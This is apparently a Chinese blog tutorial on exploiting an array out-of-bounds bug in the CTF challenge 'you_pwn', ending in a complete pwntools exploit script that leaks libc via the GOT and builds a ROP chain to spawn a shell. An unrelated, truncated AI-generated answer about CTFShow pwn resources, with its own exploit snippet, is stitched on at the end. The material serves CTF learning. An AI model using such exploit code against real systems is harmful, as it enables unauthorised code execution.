PWN入门之数组越界

该实验利用数组越界特性,填充不能用栈溢出覆盖的值。介绍了数组越界原理,包括堆和栈中的情况,重点是栈中越界。通过2019年信息安全国赛的you_pwn文件,经检测、静态分析、动态调试,泄露出ret地址、put函数在got表地址、libc地址,构造payload最终实现getshell。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

实验目的

利用数组越界的特性,去填充不能利用栈溢出的方法去覆盖的值。
通过这次实验,使我们掌握利用数组越界去继续泄露的方法。

实验文件

链接:https://pan.baidu.com/s/1tLyKYjdLXjLKjRHoivhYnQ
提取码:m6ra
我们主要通过2019年4月信息安全国赛的you_pwn来介绍一下怎么去利用数组越界。

实验步骤

首先介绍一下数组越界的原理:
数组越界分两种:一个是堆中的数组越界,一个是栈中的数组越界。
1、堆中的数组越界:
因为堆是我们自己分配的,如果越界,那么会把堆中其他空间的数据给写掉,或读取了其他空间的数据,这样就会导致其他变量的数据变得不对,如果是一个指针的话,那么有可能会引起crash,这里我们主要谈论栈中的数组越界问题。
2、栈中的数组越界:
因为栈是向下增长的,在进入一个函数之前,会先把参数和下一步要执行的指令地址(通过call实现)压栈,在函数的入口会把ebp压栈,并把esp赋值给ebp,在函数返回的时候,将ebp值赋给esp,pop先前栈内的上级函数栈的基地址给ebp,恢复原栈基址,然后把调用函数之前的压入栈的指令地址pop出来(通过ret实现)。
栈是由高往低增长的,而数组的存储是由低位往高位存的,如果越界的话,会把当前函数的ebp和下一跳的指令地址覆盖掉,如果覆盖了当前函数的ebp,那么在恢复的时候esp就不能指向正确的地方,从而导致未可知的情况,如果下一跳的地址也被覆盖掉,那么肯定会导致crash。
在这里插入图片描述

这样一下看就很明显了,当你把数组的下标越过了最大索引值的时候,所指向的指针就会指向更高地址的栈空间段,所以我们就能够实现任意改写栈空间上的内容,同理,当下标为负数的时候指针会指向更低地址的栈空间段。但是这里就有一个需要注意的地方了,利用负数改写的话我们还能达到“负数变正数”的效果。

下面我们主要通过you_pwn来介绍一下怎么利用数组越界。
首先对you_pwn进行检测,看看有没有保护机制。
在这里插入图片描述
发现堆栈是canary found ,所以我们不可以进行栈溢出。
所以我们得找其他的方法进行泄露。
RELRO存在 Partial RELRO,说明got表不可写。

对文件进行静态分析:
在这里插入图片描述
我们通过输入v1,去选择我们想看栈中的位置。
通过输入v2,去篡改栈上的值。
再进行动态调试:
先运行一下you_pwn
在这里插入图片描述
在进行输入的时候,特别要注意每次只能写一个字节,即8bit。

所以,我们可以通过输入v1、v2去泄露出ret的地址,得到栈的基址。
在这里插入图片描述
从这里可以看出ret地址距离v[4]是(0x150+0x8)
在这里插入图片描述

def one(a,offset):
    aa=0x0
    
    for i in range(8):
        p.recvuntil('input index\n')
        p.sendline(str(offset))
        p.recvuntil('now value(hex) ')
        b=int(p.recvuntil('\n',drop=True)[-2:],16)
        aa|=b<<(8*i)
        new_value=(a>>(8*i))&0xff
        p.sendline(str(new_value))
        offset+=1
       aa&=0xffffffffffffffff
    print hex(aa)
    return aa
 

因为ret地址是8位,我们一次只能泄露一个字节,所以我们循环8次。而将每一个字节拼在一起构成8位的ret地址的时候,我们通常用采用左移或者右移的方法。通过这样的方法泄露出ret的地址。

code_base=(one(0x12345678,offset))&0xfffffffffffff000

然后再与fffffffffffff000相与,得到栈的基址。因为栈的基址最后3位都是为0。
泄露出的地址:
在这里插入图片描述
然后在泄露出put函数在got表上的地址

print('puts',hex(elf.plt['puts']+code_base))

在这里插入图片描述
然后再泄露出libc的地址,然后构造system("/bin/sh")的payload。

puts_libc=u64(p.recv(6).ljust(8,'\x00'))
libc=LibcSearcher('puts',puts_libc)
libc_base=puts_libc-libc.dump('puts')
system=libc_base+libc.dump('system')
bin_sh=libc_base+libc.dump('str_bin_sh')
print('system=',hex(system))
print('bin_sh',hex(bin_sh))

在这里插入图片描述
最后进行getshell。
在这里插入图片描述
最后附上exp.py

from pwn import *
from LibcSearcher import *
context.log_level='debug'
context.terminal = ['gnome-terminal','-x','sh','-c']
p=process('./pwn')
elf=ELF('./pwn')
p.recvuntil('name:')
name='tt'
p.sendline(name)
offset=0x150+0x8
fun_entry=0x0000000000000B35
def one(a,offset):
    aa=0x0
    for i in range(8):
        p.recvuntil('input index\n')
        p.sendline(str(offset))
        p.recvuntil('now value(hex) ')
        b=int(p.recvuntil('\n',drop=True)[-2:],16)
        aa|=b<<(8*i)
        new_value=(a>>(8*i))&0xff
        p.sendline(str(new_value))
        offset+=1
    aa&=0xffffffffffffffff
    print hex(aa)
    return aa
code_base=(one(0x12345678,offset))&0xfffffffffffff000
pop_rdi=code_base+0x0000000000000d03
print('puts',hex(elf.plt['puts']+code_base))
one(pop_rdi,0x158)
one(elf.got['puts']+code_base,0x160)
#pwnlib.gdb.attach(p)
one(elf.plt['puts']+code_base,0x168)
one(fun_entry+code_base,0x170)
p.recvuntil('input index\n')
p.sendline(str(-100))
p.recvuntil('now value(hex) ')
p.sendline(str(0))
p.recvuntil('(yes/no)? \n')
p.sendline('yes')
puts_libc=u64(p.recv(6).ljust(8,'\x00'))
libc=LibcSearcher('puts',puts_libc)
libc_base=puts_libc-libc.dump('puts')
system=libc_base+libc.dump('system')
bin_sh=libc_base+libc.dump('str_bin_sh')
print('system=',hex(system))
print('bin_sh',hex(bin_sh))
one(pop_rdi,0x158)
one(bin_sh,0x160)
one(system,0x168)
one(0,-0x100)
one(0,-0x100)
p.recvuntil('input index\n')
p.sendline(str(-100))
p.recvuntil('now value(hex) ')
p.sendline(str(0))
#p.recvuntil('(yes/no)? \n')
p.recv()
p.sendline('yes')
p.interactive()
'''
0x0000000000000cfc : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
0x0000000000000cfe : pop r13 ; pop r14 ; pop r15 ; ret
0x0000000000000d00 : pop r14 ; pop r15 ; ret
0x0000000000000d02 : pop r15 ; ret
0x0000000000000cfb : pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
0x0000000000000cff : pop rbp ; pop r14 ; pop r15 ; ret
0x000000000000099b : pop rbp ; ret
0x00000000
'''
<think>好的,我现在需要帮助用户找到CTFShow平台上关于PWN入门的题解和教程。首先,用户提到了他们之前做过pwn02和pwn03,参考了相关的引用内容。我得先回忆一下CTFShow的PWN题目的结构,通常入门题会从基础栈溢出开始,然后逐步引入更多概念,比如格式化字符串漏洞、ROP链构造等。 用户需要的是入门级的教程或题解,所以应该从最基础的题目开始分析。比如pwn01可能是一个简单的栈溢出,不需要绕过canary或者ASLR。而pwn02可能涉及到一些基础漏洞利用,用户提到他们自己做出了第一道pwn题,可能在解题过程中遇到了环境配置、工具使用的问题,比如如何用pwntools编写exp,如何调试程序。引用1中用户提到踩了很多坑,比如零基础不知道怎么问,这说明教程需要详细步骤,避免跳步。 接下来,pwn03涉及到延迟绑定的知识,引用2中解释了延迟绑定是为了优化动态链接库函数的加载时间,将地址解析推迟到第一次调用。这可能涉及到GOT表和PLT表的利用,比如通过覆盖GOT表项来劫持程序流。题解可能需要介绍这些概念,并给出具体的利用步骤,比如如何泄露libc地址,如何构造payload。 然后,我需要考虑用户可能需要的资源类型。除了具体的题解,他们可能还需要工具使用的教程,比如如何安装和使用pwntools、checksec、ROPgadget等工具。此外,调试技巧也很重要,比如使用gdb的peda插件,如何下断点,查看内存等。 用户的问题可能还涉及到如何搭建实验环境,比如使用Docker配置相同的环境,或者如何获取题目对应的二进制文件和libc版本。这些都是解题过程中常见的步骤,尤其是当题目依赖特定版本的libc时,确定libc版本并计算偏移量是关键步骤。 另外,用户可能需要了解基本的漏洞类型,比如栈溢出、堆溢出、格式化字符串漏洞等。在入门阶段,栈溢出是最常见的,所以教程应该详细解释如何覆盖返回地址,如何计算偏移量,如何构造shellcode。如果题目开启了NX保护,就需要使用ROP技术,这时候可能需要介绍如何找到合适的gadgets,如何组合成有效的攻击链。 对于CTFShow的PWN题,可能每个题目都有不同的保护机制,比如NX、Canary、PIE等。题解需要指导如何检查这些保护,并相应调整攻击策略。例如,如果Canary存在,可能需要先泄露canary的值;如果PIE开启,需要先泄露某个地址来计算基址。 用户还可能遇到常见的错误,比如exp在本地运行成功但远程失败,这可能是因为环境差异,比如libc版本不同,或者网络字节序的问题。教程应该提醒注意这些点,并给出解决方法,比如使用Docker容器保持环境一致,或者动态获取远程libc的偏移。 最后,我应该整理一些具体的题解链接或资源,比如CSDN的博客、GitHub上的仓库,或者CTFShow的官方WP(如果有的话)。同时,建议用户多练习,从简单题目开始,逐步提升难度,并参与CTF比赛或刷题平台来巩固知识。</think>针对CTFShow平台PWN入门题目的学习路径和资源整理如下: ### 一、基础准备 1. **工具安装** - 安装`pwntools`:Python编写的漏洞利用框架 - 安装`checksec`:检查二进制文件保护机制(如NX、Canary) - 配置`gdb`+`peda`/`gef`:增强调试功能 ```bash pip install pwntools sudo apt install checksec ``` 2. **必要知识** - 栈溢出原理(覆盖返回地址、构造ROP链) - GOT/PLT表与延迟绑定机制[^2] - Linux系统调用(如`execve("/bin/sh")`) --- ### 二、CTFShow PWN入门题解析 #### 1. **PWN 02(栈溢出基础)** - **漏洞点**:输入无长度限制导致栈溢出 - **利用步骤**: 1. 计算偏移量:通过调试确定返回地址的偏移 2. 构造Payload:覆盖返回地址为`system("/bin/sh")`地址 - **关键代码**: ```python from pwn import * p = process('./pwn02') payload = b'A'*偏移 + p32(system_addr) + p32(0) + p32(bin_sh_addr) p.sendline(payload) p.interactive() ``` #### 2. **PWN 03(延迟绑定与GOT表劫持)** - **漏洞点**:格式化字符串漏洞 - **利用步骤**: 1. 泄露libc地址(如`puts`的GOT表项) 2. 计算libc基址与`system`函数地址 3. 覆盖`printf`的GOT表项为`system`地址 4. 触发`printf(input)`实际执行`system(input)` - **调试技巧**: ```bash gdb -q ./pwn03 b *main+0x50 # 在关键函数下断点 ``` --- ### 三、推荐学习资源 1. **文章教程** - [CTF PWN入门:从栈溢出到ROP](https://zhuanlan.zhihu.com/p/25816426) - [Linux二进制漏洞利用入门](https://ctf-wiki.org/pwn/linux/user-mode/stackoverflow/x86/stack-intro/) 2. **实战题目** - CTFShow-PWN题库(搜索“入门”标签) - [pwn.college](https://pwn.college/)(交互式练习平台) 3. **视频课程** - B站《CTF PWN从零到一》系列(工具使用+案例演示) --- ###
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值